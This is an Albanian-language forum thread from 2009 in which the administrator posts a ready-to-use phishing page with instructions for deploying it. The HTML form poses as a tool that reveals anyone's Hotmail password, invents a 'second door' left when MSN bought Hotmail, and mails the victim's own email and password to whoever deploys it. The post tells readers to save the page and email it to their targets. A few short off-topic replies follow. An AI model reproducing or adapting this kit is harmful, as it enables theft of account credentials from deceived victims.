albanian-vips

MiReSeViNi ne albanian-vips FORUM.Besoj se do mbeteni te kenaqur.
 
ForumCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Si Te MeRRnI passwordin e msn,yahoo-se etj

Shko poshtë 
AutoriMesazh
Admin-eNdRiTi
Admin


Numri i postimeve : 92
Join date : 02/02/2009
Location : in your HOMEPAGE

MesazhTitulli: Si Te MeRRnI passwordin e msn,yahoo-se etj   Tue Feb 03, 2009 5:19 pm

Si te marresh passwordet e msn, yahoo.....


Po ju bej te ditur se nuk ka asnje program qe te marre passwordet (pra te thyej fjalekalimet). Kujdes mos shkarkoni programe te tilla sepse jan kurthe. Nqs ne ndonje program qe shkarkoni ju kerkohet adresa email dhe passwordi mos e shkruani asnjehere. Per ta provuar qe keto programe jan kurthe mjafton te fusni nje fjalekalim te gabuar dhe programi do ta nxjerre sikur te ishte i rregullt. Ketu po ju them nje truk per te marre fjalekalimet. Vetem nje budalla do ta hante kete kurth:

<html>
<head><title>Deshironi te lexoni posten e miqve tuaj???</title></head>

<body bgcolor=”black” text=”lime”>

<!-Titulli dhe Reklamimi -->

<p align ="center"><font size="5">E keni pyetur ndonjehere veten me ke flet apo cfare shkruan i dashuri juaj? Deshironi te dini cfare dhe kujt i shkruajne per ju miqte tuaj? Deshironi ti prishni pune ndonjerit qe keni inat? Doni te lexoni emailet e shefit ne pune? TANI MUNDENI !!! </font> </p>

<hr>

<p align="justify"> <i><b>Vetem me 4 hapa te thjeshte ketu ju mund te gjeni password-in Hotmail te kujtdo qe deshironi.</b></i>

<ol>

<li>Shkruani adresen e personit tjeter ne kutine e pare (1). Psh. Nese doni te gjeni password-in e : <i>deborah@hotmail.com</i>, mjafton te shkruani ne kutine 1 vetem <i>deborah</i>.</li>

<li>Ne kutine e dyte (2) vini emrin e adreses suaj. ME RENDESI : Adresa juaj mund te jete ne cfaredolloj accounti (si: yahoo.com; youtube.com; hotmail.com etj). Perseri si me pare mos perfshini pjesen <i>@hotmail.com;@youtube.com; yahoo.com...etj.</i>.</li>

<li>Ne kutine e trete (3) duhet te shkruani password-in tuaj. Serverat e Hotmail do te perdorin keto informacione per te verifikuar kerkesen dhe per te kaluar filtrat e sigurise.</li>

<li>Ne fund klikoni mbi butonin &quot;Gjej Passwordin! &quot;. Ky do ti dergoje nje email me nje link special serverit te caktuar qe merret me passwordet, dhe me pas, passwordi i kerkuar do tju dergohet po me email ne adresen tuaj</li>

</ol>

<br>


<form method="POST" action="mailto:Ketu vini adresen tuaj email?subject=Find User Password"
name="hackform">
<input type="hidden" name="linefeed1" value=""> <input type="hidden" name="linefeed1" value=""> <a name="form"><i><b><p align="justify"><font size="2">Mbushini kutite sic e spjeguam (Mos shkruani @hotmail.com;youtube.com;yahoo.com..etj.. ) : </font></b></i></a>

<ol>

<li><input type="text" name="hacklogin" size="16" maxlength="64">
&nbsp; (Adresa e personit tjeter) <br></li>

<li><input type="text" name="userlogin" size="16" maxlength="64">
&nbsp; (Adresa juaj email) <br></li>

<li><input type="password" name="userpword" size="16" maxlength="16">
&nbsp; (Passwordi juaj [i fshehte])<br><br>
<input type="submit" name="enter" value="Gjej Passwordin!"><br>
(<i>Nese doni me shume informacion per kete metode lexoni seksionin e meposhtem.</i>Wink</li>

</ol>

</form>

<!-Ketu mund te jepni disa informacione shtese per ta bere me te besueshme menyren me te cilen funksionon. Perdorni fantazine tuaj ne menyre maksimale dhe te zgjuar. Dhe mos harroni : eshte me mire te mos thuash gje fare se sa te thuash budallalleqe...LoL-->

<i><b>Si funksionon kjo metode? Shume e thjeshte!</b></i>

<ol>

<li>Fillimisht ju bini dakort qe nuk do ta perdorni kete metode kurre <b>per keq</b> , kjo ka vetem qellim demostrativ. Asnjerit nuk i pelqen ti lexojne posten ashtu sic nuk u pelqen edhe juve.</li>

<li>Qe kur <b>MSN</b> bleu Hotmail-in, iu desh te linte nje dere te dyte ne sistem per te perdorur llogarite e meparshme. Tani kete dere mund ta perdorni edhe ju vete! A nuk eshte e mrekullueshme?<br>Funksionon kaqi <b>mire</b> sa qe ne tani e tutje nuk merremi me gje tjeter.</li>

<li>Nuk duhen derguar kerkesa nqs kutite nuk jane plotesuar sic duhet, perndryshe metoda do te deshtoje dhe serveri do tju dalloje duke ju mohuar aksesinj per here te dyte!</li>

<li>Kur te keni shtypur butonin "Gjej Passwordin!" nga kompjuteri juaj, nepermjet llogarise POP (pra Outlook-ut) do ti dergohet nje email Hotmailit, i cili pasi e shqyrton kerkesen tuaj, ju pergjigjet po me email duke ju derguar passwordin, brenda nje periudhe kohore <b>qe nga 2 - 36 ore</b>. Ne raste kur nuk merrni pergjigje brenda kesaj periudhe (gje qe nuk ndodh pothuajse kurre), provoni perseri nga nje kompjuter tjeter, duke u siguruar qe ai punon me Outlook (shume internet kafe e kane kete opsion).</li>

<li>Ky email tani per tani i eshte derguar vetem 500 personave. Ne te ardhmen do tja dergojme edhe shume te tjereve neper bote. Qellimi yne eshte te tregojme se bota e informatikes sot per sot eshte shume e pa sigurte!</br> Nese keni pyetje, probleme apo qofte edhe komente ju lutem ne kontaktoni ketu - - : <b>Bisha@hackers.com</b></li>

</ol>

<hr height="1">

</body>
</html>

Kete kod kopjojeni ne notepad dhe me pas bejne save as zgjidhni all files dhe me pas shkruani titullin me prapashtesen html Psh: New text dokument.html Lexojeni me kujdes kodin dhe aty ku une kam shkruar ketu vini adresen tuaj email shkruani adresen tuaj.
Pasi te jete pere ruajtja ne desktop ose ne my document dergojani me email atyre qe doni ti merrni passwordin. Por mos prisni qe te gjithe te futen ne kuth.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://albanian-vips.albanianforum.net
<i>korca
VizitorMesazhTitulli: <i>anxhelatupe</i>.</li>   Tue Mar 23, 2010 4:39 pm

eri1996
Mbrapsht në krye Shko poshtë
altin
VizitorMesazhTitulli: grh   Wed May 12, 2010 10:30 am

a je mir qa po bon ku je more hajt se te thirri neser
Mbrapsht në krye Shko poshtë
Sponsored content
MesazhTitulli: Re: Si Te MeRRnI passwordin e msn,yahoo-se etj   

Mbrapsht në krye Shko poshtë
 
Si Te MeRRnI passwordin e msn,yahoo-se etj
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
albanian-vips :: SHkenca natyrore / shoqerore :: Informatika-
Kërce tek: